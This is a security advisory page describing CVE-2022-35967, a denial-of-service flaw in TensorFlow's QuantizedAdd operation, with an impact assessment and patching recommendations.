Skip to main content

CVE-2022-35967: CWE-20: Improper Input Validation in tensorflow tensorflow

Medium
Published: Fri Sep 16 2022 (09/16/2022, 20:35:10 UTC)
Source: CVE
Vendor/Project: tensorflow
Product: tensorflow

Description

TensorFlow is an open source platform for machine learning. If `QuantizedAdd` is given `min_input` or `max_input` tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 49b3824d83af706df0ad07e4e677d88659756d89. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

AI-Powered Analysis

AILast updated: 06/22/2025, 20:06:24 UTC

Technical Analysis

CVE-2022-35967 is a medium-severity vulnerability in TensorFlow, an open-source machine learning platform widely used for developing and deploying AI models. The vulnerability arises from improper input validation (CWE-20) in the `QuantizedAdd` operation. Specifically, if the `min_input` or `max_input` tensors provided to `QuantizedAdd` have a nonzero rank (i.e., are not scalar tensors as expected), this triggers a segmentation fault (segfault) in the TensorFlow runtime. This segfault can be exploited to cause a denial of service (DoS) condition, crashing the application or service using TensorFlow. The issue affects multiple TensorFlow versions: all versions prior to 2.7.2, versions 2.8.0 up to but not including 2.8.1, and versions 2.9.0 up to but not including 2.9.1. The vulnerability was patched in GitHub commit 49b3824d83af706df0ad07e4e677d88659756d89 and incorporated into TensorFlow 2.10.0, with backports planned for 2.7.2, 2.8.1, and 2.9.1. There are no known workarounds, and no exploits have been observed in the wild to date. The root cause is a lack of proper validation of tensor shapes before processing, leading to memory access violations. Exploitation requires an attacker to supply crafted inputs to the vulnerable TensorFlow function, which may be feasible in environments where TensorFlow processes untrusted or user-supplied data. This vulnerability impacts the availability of TensorFlow-based applications by enabling DoS attacks but does not directly compromise confidentiality or integrity.

Potential Impact

For European organizations, the impact of CVE-2022-35967 primarily concerns service availability and operational continuity. Organizations leveraging TensorFlow in production environments—such as research institutions, AI startups, financial services using AI for fraud detection, healthcare providers deploying machine learning models, and industrial automation firms—may face application crashes or service interruptions if exploited. This can lead to downtime, loss of productivity, and potential financial losses. Since TensorFlow is often integrated into larger AI pipelines, a DoS in one component could cascade, affecting dependent services or delaying critical AI-driven decisions. However, the vulnerability does not allow for remote code execution or data breaches directly, limiting its impact to denial of service. The absence of known exploits reduces immediate risk, but the widespread use of TensorFlow in Europe means unpatched systems remain vulnerable. Organizations with public-facing AI services or those processing untrusted inputs are at higher risk. Additionally, sectors with stringent uptime requirements, such as telecommunications, energy, and transportation, could experience operational disruptions if this vulnerability is triggered.

Mitigation Recommendations

European organizations should prioritize upgrading TensorFlow to version 2.10.0 or later, or apply the backported patches for versions 2.7.2, 2.8.1, and 2.9.1 as soon as possible. Since no workarounds exist, patching is the only effective mitigation. Organizations should audit their AI pipelines to identify where `QuantizedAdd` operations are used and assess whether untrusted or external inputs could reach this function. Implementing input validation at the application layer to ensure tensor shapes conform to expected scalar ranks before passing them to TensorFlow can reduce risk. Monitoring application logs for segmentation faults or crashes related to TensorFlow can help detect attempted exploitation. In environments where upgrading is delayed, isolating TensorFlow workloads and limiting exposure to untrusted data sources can reduce attack surface. Additionally, integrating runtime protection tools that detect abnormal process crashes or memory violations can provide early warning. Organizations should also review their incident response plans to include scenarios involving AI service disruptions.

Need more detailed analysis?Get Pro

Technical Details

Data Version
5.1
Assigner Short Name
GitHub_M
Date Reserved
2022-07-15T00:00:00.000Z
Cisa Enriched
true

Threat ID: 682d9845c4522896dcbf405b

Added to database: 5/21/2025, 9:09:25 AM

Last enriched: 6/22/2025, 8:06:24 PM

Last updated: 7/29/2025, 6:15:37 AM

Views: 8

Actions

PRO

Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.

Please log in to the Console to use AI analysis features.

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats